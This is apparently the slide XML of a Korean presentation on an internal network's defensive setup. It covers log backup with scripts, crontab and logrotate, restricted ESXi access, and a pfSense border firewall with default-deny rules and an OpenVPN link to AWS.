      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="화살표 58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7941749" y="3523717"/>
            <a:ext cx="377808" cy="3436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781211" y="4325340"/>
            <a:ext cx="1093279" cy="322174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8982532" y="5341102"/>
            <a:ext cx="2135373" cy="72624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가로 글상자 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9314391" y="4974885"/>
            <a:ext cx="1598272" cy="366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10.10.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63" name="화살표 62"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="10396654" y="5027427"/>
            <a:ext cx="606188" cy="21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077661" y="5440734"/>
            <a:ext cx="703549" cy="52698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312113" y="5394130"/>
            <a:ext cx="562377" cy="620192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="69" name="화살표 68"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9077661" y="4133926"/>
            <a:ext cx="703548" cy="218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Image 0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86054" y="2657759"/>
            <a:ext cx="152705" cy="164367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Image 1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86054" y="3029026"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="3024125"/>
            <a:ext cx="2610612" cy="28184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공격 흔적 보존</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="2638273"/>
            <a:ext cx="2190902" cy="34159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로그 백업 목적</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Image 1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86054" y="3324301"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="3319400"/>
            <a:ext cx="2610612" cy="28184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데이터 무결성 및 신뢰성 확보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848470" y="3201543"/>
            <a:ext cx="1093279" cy="32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06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5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562280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</a:rPr>
              <a:t>스크립트 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>crontab </a:t>
            </a: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</a:rPr>
              <a:t>참고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292410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pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="그림 52"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="16990" r="10390" b="58770"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="4549139"/>
            <a:ext cx="5273040" cy="3585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4" name="그림 53"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="35780" b="28630"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6212192" y="4533371"/>
            <a:ext cx="4772313" cy="3743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5" name="그림 54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476250" y="1968119"/>
            <a:ext cx="5400040" cy="15466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7" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1669896"/>
            <a:ext cx="2943454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rocky -&gt; web log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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 가져오기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6279502" y="1660371"/>
            <a:ext cx="2943454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aws -&gt; rocky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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로그 보내기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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script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12192" y="1974848"/>
            <a:ext cx="4814552" cy="2182392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4241646"/>
            <a:ext cx="2943454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crontab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6208687" y="4260696"/>
            <a:ext cx="2943454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crontab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53370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vsphere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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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backup server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3172013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5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609905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</a:rPr>
              <a:t>백업 서버 구동</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53370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vsphere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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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backup server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="그림 50"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="970" r="13640" b="17820"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1505102"/>
            <a:ext cx="7317493" cy="42489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3" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647624" y="5891566"/>
            <a:ext cx="4785180" cy="54609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5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172.16.0.125 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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서버에 백업 로그 저장</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Image 0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8719" y="5925388"/>
            <a:ext cx="152705" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7858581" y="1489873"/>
            <a:ext cx="28554" cy="2803144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24"/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Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767608" y="2157843"/>
            <a:ext cx="2864726" cy="30083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AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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서버</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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apache log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err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auth</a:t>
            </a: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log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0" err="1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suricata</a:t>
            </a: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log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8245435" y="1975878"/>
            <a:ext cx="2971366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55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45435" y="2157843"/>
            <a:ext cx="189817" cy="205555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8761569" y="2947426"/>
            <a:ext cx="3021944" cy="65570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사내 커뮤니티 서버</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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apache log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 syslog</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8598346" y="1622919"/>
            <a:ext cx="2828469" cy="19269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서버별 전송 로그</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Image 3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237277" y="1628699"/>
            <a:ext cx="172601" cy="186912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8789362" y="3613644"/>
            <a:ext cx="2842972" cy="61153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기밀 문서 서버</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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apache log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CBD5E1"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>- messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75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45207" y="2952115"/>
            <a:ext cx="189817" cy="205555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76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45435" y="3617596"/>
            <a:ext cx="189817" cy="205555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="가로 글상자 76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7887134" y="4675155"/>
            <a:ext cx="3745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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/backup/*/*/* {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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    monthly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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    rotate 0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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>postrotate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/backup/ -type d -empty -delete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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>endscript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text 54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7907956" y="4445717"/>
            <a:ext cx="1972361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logrotate</a:t>
            </a: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261321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5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432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343205" y="952805"/>
            <a:ext cx="4193438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>
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>ESXI </a:t>
            </a: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</a:rPr>
              <a:t>웹 페이지 접근 제한 설정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073335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3019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34320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vsphere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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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esxi 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</a:rPr>
              <a:t>보안 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="그림 59"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="560" t="230" r="37420"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="343205" y="1353312"/>
            <a:ext cx="5485135" cy="31919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1" name="그림 60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370172" y="4630565"/>
            <a:ext cx="5458169" cy="211924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3" name="그림 62"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="37720" t="40720" r="45070" b="26230"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510661" y="1353312"/>
            <a:ext cx="3181674" cy="27694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4" name="직사각형 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510661" y="1334660"/>
            <a:ext cx="3181675" cy="278814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611707" y="2645283"/>
            <a:ext cx="2216633" cy="159733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66" name="직선 연결선 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5542225" y="1593807"/>
            <a:ext cx="1310623" cy="79232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14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5828341" y="4122799"/>
            <a:ext cx="682318" cy="1198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19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593701" y="4343074"/>
            <a:ext cx="3895877" cy="20217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관리자 </a:t>
            </a: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pc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에서만 </a:t>
            </a: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esxi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웹페이지 접근 허용</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Image 1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356184" y="4360678"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565126" y="5743249"/>
            <a:ext cx="3895877" cy="20217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기본적으로 </a:t>
            </a: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esxi ssh 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접속을 막아두며 필요할 때 수동을 키도록 설정</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Image 1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327609" y="5760853"/>
            <a:ext cx="178905" cy="1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571500" y="838505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pfSense-1 : Core Gateway Firewall(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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사내 경계 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="3840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" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="323698"/>
            <a:ext cx="2924251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pfSense-1의 역할</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3703320"/>
            <a:ext cx="11041380" cy="2773374"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="4390212"/>
            <a:ext cx="4368820" cy="5643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Stateful Packet Inspection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기반 방화벽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WAN(10.0.0.139) → LAN(172.16.0.222)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방향 트래픽을 정책 기반으로 제어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내부망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(172.16.0.0/24)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은 기본 차단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명시적 허용 규칙만 통과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="5619223"/>
            <a:ext cx="4368820" cy="5643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IP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구조 은닉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(172.16.0.0/24)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부서 간 통신 시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NO-NAT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정책 적용 → 내부 라우팅 유지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OpenVPN,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 서버 트래픽은 의도된 경로로만 전달</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306658" y="4355371"/>
            <a:ext cx="3350870" cy="73172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Stateful Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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기반으로 세션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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포트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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출발지 정책 통제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty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ko-KR" altLang="en-US" sz="1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외부 → 내부 신규 연결 기본 차단 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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(Default Deny)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1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관리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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운영 트래픽만 명시적 허용 규칙 적용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286169" y="5619904"/>
            <a:ext cx="3350870" cy="37888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EC2(OpenVPN Server)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와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Site-to-Site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개념 연결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원격 관리자 →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AWS → pfSense-1 →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내부망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 관리 트래픽은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VPN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을 통해서만 허용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="4118678"/>
            <a:ext cx="3489178" cy="23917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경계 방화벽 (Border Firewall)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852628" y="5348478"/>
            <a:ext cx="2147367" cy="23917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NAT 및 </a:t>
            </a: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트래픽 제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306658" y="4083837"/>
            <a:ext cx="4347274" cy="2740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트래픽 정책 기반 통제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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Policy-based Control)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286168" y="5348369"/>
            <a:ext cx="2901696" cy="23917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VPN 게이트웨이 (AWS) </a:t>
            </a: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연동</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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739" y="4224852"/>
            <a:ext cx="280212" cy="26441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18713" y="5454652"/>
            <a:ext cx="350266" cy="264419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 rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-1280" r="-1280"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497369" y="4190010"/>
            <a:ext cx="268884" cy="264419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502076" y="5454543"/>
            <a:ext cx="233031" cy="264419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1752905"/>
            <a:ext cx="11041380" cy="1752905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2268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3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-40" b="-40"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="2104949"/>
            <a:ext cx="133502" cy="152705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="2523744"/>
            <a:ext cx="4934102" cy="74340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10.0.0.0/24 : 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사내 공통 네트워크 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본사 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/ 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외부 연계 구간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</a:t>
            </a:r>
          </a:p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172.16.0.0/24 : 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 업무망 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운영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·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관리자 네트워크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</a:t>
            </a:r>
          </a:p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pfSense-1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은 사내 공통망과 내부망 사이의 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차 보안 관문</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
